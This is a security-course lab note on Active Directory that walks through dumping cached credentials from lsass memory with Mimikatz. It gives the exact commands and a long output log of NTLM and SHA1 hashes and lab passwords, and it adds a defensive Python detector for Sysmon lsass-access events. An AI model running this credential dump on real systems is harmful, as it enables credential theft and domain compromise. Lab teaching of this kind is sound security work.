# NTUSTISC - AD Note - Lab (Obtaining the Local Admin's NTLM hash with Mimikatz)
[TOC]
Lecture Video: [2022/05/04 AD Security 1](https://youtu.be/Cv2gNQkDM8Q?si=l1na5hFGpAPk6Uux&t=4257)
## Background
Once you have elevated privileges, the next thing you want is more passwords.
* Password collection
    * SAM.hive (Security Account Manager)
    * Password Spraying (guessing)
    * GPO
        * Where: `\\<domain>\SysVol\<domain>\Policies`; in this lab that is `\\kuma.org\SYSVOL\kuma.org\Policies`. Under it are randomly generated `<UID>\Users\Scripts` and `<UID>\Machine\Scripts` folders, and these two script locations are the ones we consider important.
    * Memory (lsass)
        * To collect more account passwords and move closer to Domain Admin, Mimikatz can be used to pull the cached credentials.
* ==What is Mimikatz?==
>Mimikatz is a powerful Windows privilege-escalation tool. It can elevate process privileges and inject into a process to read its memory, and it can pull the cleartext passwords of users who have logged on to the system directly out of lsass.
>lsass is the security mechanism of Microsoft Windows; it is mainly used for local security and logon policy. Normally, after we type a password when logging on, the password is stored in lsass memory; after being passed through its wdigest and tspkg modules it is encrypted with a reversible algorithm and kept in memory, and mimikatz obtains the cleartext password precisely by reversing lsass's algorithm.
Put simply, every logon authentication is handed to lsass, so it holds everyone's credentials.
* Download: [Mimikatz-github](https://github.com/gentilkiwi/mimikatz)
* How to use:
The latest Mimikatz release consists of three files (mimilib.dll, mimikatz.exe, mimidrv.sys) and comes in a Win32 build (which has one extra file, mimilove.exe) and an x64 build.
After downloading, just extract the archive; inside are Win32 and x64 folders. Win32 is for 32-bit Windows and x64 for 64-bit operating systems, and the vast majority of systems today are 64-bit.
* ==lsass.exe VS SAM==
The SAM only holds the NTLM hashes of local users, whereas lsass.exe records every user who has authenticated to the current machine, so a domain admin, or any other user connecting in over SMB, is recorded by lsass as well.
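Because lsass caches the credentials of every account that has authenticated to the host, the defensive counterpart of this section is to alert when an unexpected process opens lsass.exe for memory reads. The Python below is an added example, not part of this note and not Mimikatz code: it parses rendered Sysmon Event ID 10 (ProcessAccess) messages and flags handles to lsass.exe that request memory access or whose call stack contains frames not backed by any module (`UNKNOWN`), unless the source image is on a host-specific allowlist. The access-right constants are the documented Win32 values; the allowlist and the sample events are constructed assumptions to be tuned per environment.

```python
"""Flag suspicious handles to lsass.exe from Sysmon Event ID 10 messages.

Added example (not from the note or from Mimikatz). Sample events are constructed.
"""
import re

# Documented Win32 process access rights (winnt.h).
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Images expected to open lsass on this host. Assumption: tune per environment.
ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

FIELD_RE = re.compile(r"^\s*(\w+):\s*(.*?)\s*$")


def parse_event(message: str) -> dict:
    """Parse a rendered Sysmon message ('Key: value' per line) into a dict."""
    fields = {}
    for line in message.splitlines():
        m = FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_suspicious_lsass_access(ev: dict) -> bool:
    """True when a non-allowlisted process asks for lsass memory access."""
    if not ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        return False
    if ev.get("SourceImage", "").lower() in ALLOWLIST:
        return False
    try:
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
    except ValueError:
        return True  # unparsable mask: surface it for review rather than drop it
    reads_memory = bool(granted & (PROCESS_VM_READ | PROCESS_VM_WRITE))
    # Frames in memory not backed by a module are typical of injected code.
    unbacked_frames = "UNKNOWN" in ev.get("CallTrace", "")
    return reads_memory or unbacked_frames


def triage(messages) -> list:
    """Return (SourceImage, GrantedAccess) for each event worth investigating."""
    hits = []
    for msg in messages:
        ev = parse_event(msg)
        if is_suspicious_lsass_access(ev):
            hits.append((ev["SourceImage"], ev["GrantedAccess"]))
    return hits


# Constructed sample messages in Sysmon's rendered layout (not real telemetry).
SAMPLE_EVENTS = [
    """Process accessed:
RuleName: -
SourceProcessId: 4212
SourceImage: C:\\tools\\mimikatz_trunk\\x64\\mimikatz.exe
TargetProcessId: 712
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\tools\\mimikatz_trunk\\x64\\mimikatz.exe+3a1f0""",
    """Process accessed:
SourceImage: C:\\Program Files\\Windows Defender\\MsMpEng.exe
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1fffff
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4""",
    """Process accessed:
SourceImage: C:\\Windows\\system32\\taskmgr.exe
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1000
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4""",
    """Process accessed:
SourceImage: C:\\Users\\bear\\Downloads\\update.exe
TargetImage: C:\\Windows\\system32\\lsass.exe
GrantedAccess: 0x1400
CallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(00000201A3F20000)""",
]

if __name__ == "__main__":
    for source, access in triage(SAMPLE_EVENTS):
        print(f"ALERT lsass access {access} from {source}")
```

On the constructed sample, the first event (memory-read rights, 0x1010) and the fourth (an unbacked frame in the call stack) are reported; the allowlisted AV engine and a process asking only for query-limited rights (0x1000) are not.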
## Lab
### ==Obtaining the Local Admin's NTLM hash with Mimikatz==
1. Launch Mimikatz
Go to `C:\tools\mimikatz_trunk\x64`, right-click mimikatz.exe and run it as administrator (it must be run as administrator, otherwise the debug-privilege step below fails).
2. Opening commands
```bash
mimikatz # Privilege::Debug
Privilege '20' OK
mimikatz # log
Using 'mimikatz.log' for logfile : OK
mimikatz # Sekurlsa::logonPasswords
```
:::spoiler Log Result
```bash
Using 'mimikatz.log' for logfile : OK
mimikatz # Sekurlsa::logonPasswords
Authentication Id : 0 ; 23133312 (00000000:0160fc80)
Session : CachedInteractive from 1
User Name : Administrator
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/9/4 06:07:18
SID : S-1-5-21-306106713-2531972042-334329499-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : cf967ea9c9c0f9d58b79fdd040270648
tspkg :
wdigest :
* Username : Administrator
* Domain : kuma
* Password : (null)
kerberos :
* Username : Administrator
* Domain : KUMA.ORG
* Password : 1qaz@WSX3edc
ssp :
credman :
cloudap :
Authentication Id : 0 ; 20047794 (00000000:0131e7b2)
Session : CachedInteractive from 1
User Name : Administrator
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/9/4 10:19:22
SID : S-1-5-21-306106713-2531972042-334329499-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : cf967ea9c9c0f9d58b79fdd040270648
tspkg :
wdigest :
* Username : Administrator
* Domain : kuma
* Password : (null)
kerberos :
* Username : Administrator
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 16441076 (00000000:00fadef4)
Session : Interactive from 1
User Name : administrator
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/9/4 12:44:48
SID : S-1-5-21-306106713-2531972042-334329499-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : cf967ea9c9c0f9d58b79fdd040270648
tspkg :
wdigest :
* Username : Administrator
* Domain : kuma
* Password : (null)
kerberos :
* Username : administrator
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 14849757 (00000000:00e296dd)
Session : Service from 0
User Name : DefaultAppPool
Domain : IIS APPPOOL
Logon Server : (null)
Logon Time : 2023/9/3 09:44:12
SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 1299130 (00000000:0013d2ba)
Session : Interactive from 1
User Name : bear
Domain : kuma
Logon Server : WIN-818G5VCOLJO
Logon Time : 2023/8/29 12:47:58
SID : S-1-5-21-306106713-2531972042-334329499-2101
msv :
[00000003] Primary
* Username : bear
* Domain : kuma
* NTLM : 7ecffff0c3548187607a14bad0f88bb1
* SHA1 : 47af9144ed0e6f8964c1453dc7c2219dbdf046f0
* DPAPI : 4057a0d0b94378dd03224e8b3d28a006
tspkg :
wdigest :
* Username : bear
* Domain : kuma
* Password : (null)
kerberos :
* Username : bear
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 995 (00000000:000003e3)
Session : Service from 0
User Name : IUSR
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/8/29 12:40:42
SID : S-1-5-17
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2023/8/29 12:40:39
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 70138 (00000000:000111fa)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 70109 (00000000:000111dd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : DESKTOP-G95U93T$
Domain : kuma
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-20
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : desktop-g95u93t$
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 47346 (00000000:0000b8f2)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 46297 (00000000:0000b4d9)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2023/8/29 12:40:38
SID : S-1-5-96-0-0
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : DESKTOP-G95U93T$
* Domain : kuma.org
* Password : maj"2g<h(&iQZ7kqFHQ4X&c;_wQq3V;*gq.(A=4&)\2eesNp8S=W)C,"nM:ns?6m.%;K4+CSGDFew>VaNQ;N_)?mB1\P9udE7Gs'Lsr ccxo*CyL=JdK"'kF
ssp :
credman :
cloudap :
Authentication Id : 0 ; 44132 (00000000:0000ac64)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2023/8/29 12:40:37
SID :
msv :
[00000003] Primary
* Username : DESKTOP-G95U93T$
* Domain : kuma
* NTLM : 5648c9d78a770f3e0f727a5fac99da5a
* SHA1 : 074499733e91d086762a4bc2df67f5fa51c43221
tspkg :
wdigest :
kerberos :
ssp :
credman :
cloudap :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DESKTOP-G95U93T$
Domain : kuma
Logon Server : (null)
Logon Time : 2023/8/29 12:40:37
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : DESKTOP-G95U93T$
* Domain : kuma
* Password : (null)
kerberos :
* Username : desktop-g95u93t$
* Domain : KUMA.ORG
* Password : (null)
ssp :
credman :
cloudap :
```
:::
As you can see, this output is far more complete than the SAM dump mentioned earlier. The reason for using `log` is that it writes the output to a file, which makes it easier to search for useful information in a familiar text editor. Also, ==Privilege::Debug== means asking Windows for the privilege to debug lsass.